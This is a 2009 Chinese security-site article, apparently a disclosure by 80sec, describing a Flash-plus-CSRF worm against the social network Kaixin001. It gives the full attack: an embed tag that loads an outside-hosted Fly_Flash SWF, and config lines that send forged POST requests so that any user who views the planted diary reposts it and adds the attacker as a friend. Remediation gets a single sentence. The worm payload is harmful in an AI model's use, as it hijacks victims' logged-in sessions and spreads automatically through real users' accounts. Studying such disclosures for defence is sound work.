首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
利用Fly_Flash蠕虫攻击开心网
来源:http://www.80sec.com/ 作者:80sec 发布时间:2009-09-22  

背景说明:开心网是SNS类型网站中做得非常成功的一个站点,拥有海量的用户群,提供的服务包括照片存储与分享、日记分享、短消息与在线聊天等沟通手段、休闲游戏、在线音乐播放分享等,而其本身对安全也相对于其他网站来说有较多关注。80sec发现开心网中的某些地方实现得并不好,存在一些安全漏洞,而某些安全漏洞却对于web安全非常具有代表性,在某些情况下可能造成比较大的影响,本次攻击测试即是对问题的简单证明,同时后续会给出处理此类问题时的解决方案。

漏洞分析:Flash在越来越多的网站得到广泛的应用,往往被用来播放视频,游戏或者是其他复杂的用户交互功能,但是在使用Flash的时候,大部分的网站处理的时候并没有想象中那么安全,譬如在开心网的发日记的地方使用Flash的方式如下:


<embed allowscriptaccess="never" height=384 width=454 src=http://www.80sec.com/x.swf wmode="transparent" loop="false" autostart="false">

开心网直接允许在页面引入其他域的Flash,同时为了安全性,在使用的时候用到了allowscriptaccess属性来做限制。整个代码使用语法分析的方式来做过滤,无法被绕过,但是这里漏掉了一个重要的属性allowNetworking,利用这个属性flash可以通过浏览器做网络访问。
同时开心网另外一个严重的问题就是CSRF问题,尽管其在重要的数据更改的地方都限制只能使用POST方式提交,但是所有的请求数据内容可以被预知,很容易就实现CSRF攻击。而开心网用户之间的交互非常之多,利用一些简单的功能就可以实现将某些内容引诱其他用户访问,CSRF的固有的攻击的被动性可以得到有效的弥补。
综合上面几点,我们就可以利用其中的漏洞主动的攻击开心网在线用户了。

技术实现:80sec之前提供了一款用于Flash渗透测试的工具Fly_Flash,具体地址为http://www.80sec.com/fly_flash-0-1-release.html,利用Fly_Flash我们可以很方便的实现一次渗透测试,譬如在配置文件里写上


3,http://www.80sec.com/action.php?80sec,,,user=data&pass=data

既可以使用浏览器当前的会话像www.kaixin001.com发起一个请求,请求的内容为后面的user=data&pass=data部分,并且整个请求不会受到浏览器的隐私策略的限制,可以同时使用持久Cookie和Session Cookie。

1 发布一个含有测试Flash的帖子,内容包括一些有吸引力的文字和隐藏在文字之间的Flash代码


<embed allowscriptaccess="never" height=384 width=454 src=http://www.80sec.com/fly_flash.swf?sec80=http://www.80sec.com/fly_flash.txt&x.swf wmode="transparent" loop="false" autostart="false">

2 http://www.80sec.com/fly_flash.txt内容是我们要构造的数据包请求,这里利用开心网的转贴功能实现内容在用户之间的传播


2,http://img.users.51.la/3182000.asp
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20569243&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20570931&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20567962&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/friend/addverify.php?80sec,,,from=&touid=773000&content=hi+%0D%0A%3A%29&rcode=&code=&usercode=&email=&bidirection=

其中2,http://img.users.51.la/3182000.asp用作访问的统计,后面的就是自己构造的对http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php发起的POST请求,后面的数据就是上面我们构造好的邪恶的日记。而一旦用户看了这篇日记之后就会自动进行转贴,一旦其他好友查看之后就会再次自动转贴,蠕虫实现了借助转贴功能的传播。

3 恩,结束,就这么简单。

漏洞修复:我们将在后续对Flash的安全使用问题做深入探讨,这里建议开心网从根本上对CSRF问题做防范,具体方式可以参考80sec以前的文章。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·php版ewebeditor 3.8的漏洞
·DEDECMS小说连载模块0day
·小谈WIN系统Hacking中提权前的小
·小谈WIN系统Hacking中的小命令2
·续谈Hacking中的小技巧
·Gene6 FTP Server提权方法
·墨尔本及高雄电影节官网漏洞揭露
·电信局入侵实例
·Javascript Paste Keyboard Shor
·unix入侵
·如何使用MySQL提升权限
·如何渗透域
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved